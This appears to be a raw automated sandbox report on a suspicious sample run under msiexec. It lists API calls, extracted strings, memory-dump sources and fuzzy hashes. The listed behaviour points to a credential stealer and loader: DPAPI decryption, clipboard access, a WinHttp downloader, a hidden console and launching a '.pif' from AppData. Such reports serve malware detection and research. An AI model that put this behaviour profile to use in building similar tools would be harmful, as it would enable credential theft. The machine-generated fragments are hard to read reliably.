27909->27957 27912 619cb1c 27914 619cb99 27912->27914 27912->27918 27913 619cac3 27958 618e279 39 API calls __wsopen_s 27913->27958 27960 618e2a6 11 API calls std::locale::_Setgloballocale 27914->27960 27917 619cba5 27918->27854 27918->27855 27920 61997f8 ___scrt_is_nonwritable_in_current_image 27919->27920 27963 618e31b EnterCriticalSection 27920->27963 27922 61997ff 27923 6199824 27922->27923 27927 6199893 EnterCriticalSection 27922->27927 27929 6199846 27922->27929 27967 61995c6 15 API calls 3 library calls 27923->27967 27927->27929 27930 61998a0 LeaveCriticalSection 27927->27930 27928 6199829 27928->27929 27968 6199714 EnterCriticalSection 27928->27968 27964 61998f6 27929->27964 27930->27922 27932->27866 27933->27869 27934->27864 27935->27865 27936->27869 27937->27879 27938->27869 27939->27876 27940->27882 27941->27881 27942->27883 27943->27864 27944->27886 27945->27892 27946->27896 27947->27894 27950 619c9d4 27948->27950 27949 619c9ef 27949->27909 27950->27949 27961 618ee44 14 API calls __dosmaperr 27950->27961 27952 619ca13 27962 618e279 39 API calls __wsopen_s 27952->27962 27954 619ca1e 27954->27909 27955->27905 27956->27907 27957->27913 27958->27908 27959->27912 27960->27917 27961->27952 27962->27954 27963->27922 27969 618e363 LeaveCriticalSection 27964->27969 27966 6199866 27966->27859 27966->27860 27967->27928 27968->27929 27969->27966 27970 2f3dd8 27972 2f3de0 27970->27972 27971 2f3e8f CryptUnprotectData 27971->27972 27972->27971 26975 2ed8b7 26976 2ed8bd 26975->26976 26977 2ed8cc CoUninitialize 26976->26977 26978 2ed900 26977->26978 26979 3074aa 26981 3074e0 26979->26981 26980 30764e 26981->26980 26983 319510 LdrInitializeThunk 26981->26983 26983->26980 26984 31646e 26985 316474 RtlFreeHeap 26984->26985

Control-flow Graph
[Control-flow graph 92, first block 313ba0-313bf4; legend: Executed / Not Executed]
APIs
• CoCreateInstance.OLE32(0031F680,00000000,00000001,0031F670,00000000), ref: 00313CA1
• SysAllocString.OLEAUT32(398B3B82), ref: 00313D11
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00313D5B
• SysAllocString.OLEAUT32(398B3B82), ref: 00313DB8
• SysAllocString.OLEAUT32(49F14BE1), ref: 00313E76
• VariantInit.OLEAUT32(?), ref: 00313EE1
Memory Dump Source
• Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
Similarity
• API ID: AllocString$BlanketCreateInitInstanceProxyVariant
• String ID: C$E!q#$\
• API String ID: 65563702-541809082
• Opcode ID: 4ff27c135f18b3f90a2921892921384a001120378a73ffae443729098db614c5
• Instruction ID: 349d0a3fa53b40e89a8c16a7107115dde002207d3d70210679dcfa507bc2903c
• Opcode Fuzzy Hash: 4ff27c135f18b3f90a2921892921384a001120378a73ffae443729098db614c5
• Instruction Fuzzy Hash: 77223171A083009FD319CF24CC41BABBBE5EF89314F098A2CF9999B281D774D945CB92

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: +$:$>$L$N$W$a$i$k$x
                                                                                                                                                                                                                                • API String ID: 0-1239699176
                                                                                                                                                                                                                                • Opcode ID: 3c54c9582772e8f90040d63e7661f6045403ff70ffc8544d980c8a8d9df85ccc
                                                                                                                                                                                                                                • Instruction ID: ba8f93fbef7e4f15ee6308724bb89c9e771a4974945e2f14ee0e2284b1955634
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c54c9582772e8f90040d63e7661f6045403ff70ffc8544d980c8a8d9df85ccc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B420372A1C7808BD7649F3884C53AEFBD1ABC5364F594A7DE9E9C73C2D67488408B42

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: =:;8$=:;8$FI{{$InA>$iiWU$r/$uyz|
                                                                                                                                                                                                                                • API String ID: 0-248323398
                                                                                                                                                                                                                                • Opcode ID: d7502ca8308407c2580dcac9cba9830b4cf93de3e0ef52f700e95139c984f547
                                                                                                                                                                                                                                • Instruction ID: 5cca550d872657deac42fb9367d23b6752a31da503c5ed8b673bace5aa1ff5cc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7502ca8308407c2580dcac9cba9830b4cf93de3e0ef52f700e95139c984f547
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B422EF75618301CFD729CF28DC9072AB7E6FB89314F0A887CE5858B2A1E735DA12CB41

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess$ExitForegroundThreadWindow
                                                                                                                                                                                                                                • String ID: rXT
                                                                                                                                                                                                                                • API String ID: 3118123366-3474455373
                                                                                                                                                                                                                                • Opcode ID: 27d644386af3ee0469be2f220536f8ccddad42c63f88525c825f32ed9ca1f798
                                                                                                                                                                                                                                • Instruction ID: bb8a552e27ff22234225fde2fcdd10b429d509008e1d97ea076321c30a9aa46a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27d644386af3ee0469be2f220536f8ccddad42c63f88525c825f32ed9ca1f798
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF712973BA47180BC71CADBACC953A9B6D79BC8610F4EC13D9999C7345EEB89C0842C1

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                • String ID: >PFb$yvwA$9Ua
                                                                                                                                                                                                                                • API String ID: 3664257935-121258406
                                                                                                                                                                                                                                • Opcode ID: 5824901ce8605a74371ca0b667cecc239ddaf7cf6288e0c4ae9e51ccd2d6eb6b
                                                                                                                                                                                                                                • Instruction ID: a9daadc5ff8a3e92a93f194369ab5f6b90641ccfb55651199fcff6e143f506f8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5824901ce8605a74371ca0b667cecc239ddaf7cf6288e0c4ae9e51ccd2d6eb6b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CE1A360615B818EE726CF35C4607B3BBE1AF57304F08889DC1EB9B6C2DB796506CB25

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: HiRk$gQlS$gU`W$i]m_
                                                                                                                                                                                                                                • API String ID: 0-1269447593
                                                                                                                                                                                                                                • Opcode ID: 567d483f10622ce8991a5f1686accd18a6d629f7fb8860830e86e1889b66a16b
                                                                                                                                                                                                                                • Instruction ID: 04c3feba9a6a1e02f5a568c2f266893ca627840c27744941c4702454bc6fcc0d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 567d483f10622ce8991a5f1686accd18a6d629f7fb8860830e86e1889b66a16b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F80244B1211B40CFE3358F25D891B97BBF5FB49314F158A2CE5A78BA90CB75A409CB90

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: >PFb$yvwA$9Ua
                                                                                                                                                                                                                                • API String ID: 0-121258406
                                                                                                                                                                                                                                • Opcode ID: 28d913b23d1f091c5a6fb858c55460a34e0b74435b894e96c866446e92d2aaf0
                                                                                                                                                                                                                                • Instruction ID: 46af09be7371c7f55c6cb27ac5a05ad751456771513fed05e9ea64f85f9ad5e1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28d913b23d1f091c5a6fb858c55460a34e0b74435b894e96c866446e92d2aaf0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BE1D870615B418FE726CF35C4A17A3BBE1AF56314F08896DC0EA8B7C2DB39A505CB61
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: )$*$+
                                                                                                                                                                                                                                • API String ID: 0-1294817745
                                                                                                                                                                                                                                • Opcode ID: 221f43c9300587713883b289a5d4e6fb26d59f628a49b228af651ab72b21585e
                                                                                                                                                                                                                                • Instruction ID: 24b2a9ab03822b12f31bdaef37b8896085259c64b92f025832d02b4f4dc8381c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 221f43c9300587713883b289a5d4e6fb26d59f628a49b228af651ab72b21585e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3A1F670908284CFDB16CF7CC4853EDBFE5AB0A320F19895AD4959B386D3358A89CB52
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: (S Q$[Y
                                                                                                                                                                                                                                • API String ID: 0-3290677499
                                                                                                                                                                                                                                • Opcode ID: 7a7a65401f80fe6cd0b656ebf93774012db55ebd7fc688ddb880b61c058d13ac
                                                                                                                                                                                                                                • Instruction ID: 2c99e27b6e666627541890f2ef54f05c35318a0ecb266ffd359e5b845258d33b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7a65401f80fe6cd0b656ebf93774012db55ebd7fc688ddb880b61c058d13ac
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 233134B18153098BD310DF24C881677F7B6EF92760F44852CF9988B291E778DD05D7A2
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 002F3EA9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 834300711-0
                                                                                                                                                                                                                                • Opcode ID: 1de1f07f9435317bfd4828cd2c886ffe5e950c0bacbef558f295b5acc13c0e9f
                                                                                                                                                                                                                                • Instruction ID: 3800b44608ba1bab1e3db72d4860da9f5e6a0c6997ebce1b7d2099b0526af527
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1de1f07f9435317bfd4828cd2c886ffe5e950c0bacbef558f295b5acc13c0e9f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2751F3B19182429FD724CF28C49177FBBE5AF94344F154A3CE2D987242E731D955CB82
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(0031CBA8,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0031953E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID: tpFy
                                                                                                                                                                                                                                • API String ID: 2994545307-504537500
                                                                                                                                                                                                                                • Opcode ID: 1590b1621b8b335201bfaa3bf4519d6beaa805b758fe07909fa7a5027ce3c9ba
                                                                                                                                                                                                                                • Instruction ID: a84e1619a6edc5bdcd7d2fc4c827a986897a260c9e78737cdb134e54b8b762ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1590b1621b8b335201bfaa3bf4519d6beaa805b758fe07909fa7a5027ce3c9ba
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7512471755B448FD32ACE39CCA17A3BBD2EB96304F2D846DD0DA8B791D275A8018710
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 42b02d03aa998277192be9ed65371eda3348278b60b442615ff1c92de7471bff
                                                                                                                                                                                                                                • Instruction ID: b9c7c05ca498afe1ce962789be4c4fa9ac6526ad10e7973d90e9f8b4387ec3e7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42b02d03aa998277192be9ed65371eda3348278b60b442615ff1c92de7471bff
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D49168B6A093054BD72ADE65CCB577BB6D6EF86304F0E843DE8864B2D1E6719C00C792
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1647500905-0
                                                                                                                                                                                                                                • Opcode ID: faf1d9b39851012b8bbbffbecdd4d63ec6fa25be650322c63127f2a91d4768a3
                                                                                                                                                                                                                                • Instruction ID: 98bb4447d7256fc6c7c431c2bc9b13101a3d7139e1eecc24295bbd9c34c6ef18
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: faf1d9b39851012b8bbbffbecdd4d63ec6fa25be650322c63127f2a91d4768a3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC61B8B2F993900BD724AA21AC533DFB6968FD1314F48443CE88997382DF781A1687D3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0

APIs
• WinHttpCrackUrl.WINHTTP(?,?,00000000,?), ref: 061832EC
• WinHttpOpen.WINHTTP(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko),00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 0618336E
• WinHttpConnect.WINHTTP(00000000,?,?,00000000,?,?,00000000,?), ref: 061833F4
• WinHttpCloseHandle.WINHTTP(00000000,Failed to connect to server.,0000001C,?,?,00000000,?), ref: 06183469
• WinHttpOpenRequest.WINHTTP(00000000,GET,?,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 0618349D
• WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 06183523
• WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,00000000,?), ref: 06183534
• WinHttpReadData.WINHTTP(00000000,?,00001000,?), ref: 06183647
• WinHttpReadData.WINHTTP(00000000,?,00001000,00000000,?,00000000,00000000), ref: 06183684
• WinHttpCloseHandle.WINHTTP(00000000), ref: 061836CD
• WinHttpCloseHandle.WINHTTP(?), ref: 061836D5
• WinHttpCloseHandle.WINHTTP(00000000), ref: 061836D8
• std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0618374B
• WinHttpCloseHandle.WINHTTP(00000000,Failed to send request or receive response.), ref: 061837C5
• WinHttpCloseHandle.WINHTTP(?), ref: 061837CD
• WinHttpCloseHandle.WINHTTP(00000000), ref: 061837D0
Strings
• GET, xrefs: 06183497
• Failed to open WinHTTP session., xrefs: 06183385
• Failed to crack URL., xrefs: 06183301
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko), xrefs: 06183369
• Failed to connect to server., xrefs: 06183411
• Failed to open HTTP request., xrefs: 061834B4
• Failed to open output file., xrefs: 061835C5
• Failed to send request or receive response., xrefs: 06183767
Memory Dump Source
• Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
• Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
Similarity
• API ID: Http$CloseHandle$DataOpenReadRequest$ConnectCrackIos_base_dtorReceiveResponseSendstd::ios_base::_
• String ID: Failed to connect to server.$Failed to crack URL.$Failed to open HTTP request.$Failed to open WinHTTP session.$Failed to open output file.$Failed to send request or receive response.$GET$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
• API String ID: 3056166987-2845382455

APIs
• GetConsoleWindow.KERNEL32 ref: 061838B0
• ShowWindow.USER32(00000000,00000000), ref: 061838B9
• SleepEx.KERNELBASE(00002710,00000000), ref: 061838C6
• SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 061838DC
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 06183F0E
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 06183F1E
• CloseHandle.KERNEL32(?), ref: 06183F2E
• CloseHandle.KERNEL32(?), ref: 06183F34
Strings
Memory Dump Source
• Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
• Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
Similarity
• API ID: CloseHandleWindow$ConsoleCreateFolderObjectPathProcessShowSingleSleepWait
• String ID: " "$.pif$D$Failed to get AppData path.
• API String ID: 161660808-1906643966

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0619C997: CreateFileW.KERNELBASE(00000000,00000000,?,0619CCF9,?,?,00000000,?,0619CCF9,00000000,0000000C), ref: 0619C9B4
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0619CD64
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0619CD6B
                                                                                                                                                                                                                                • GetFileType.KERNELBASE(00000000), ref: 0619CD77
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0619CD81
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0619CD8A
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0619CDAA
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0619CEF7
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0619CF29
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0619CF30
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
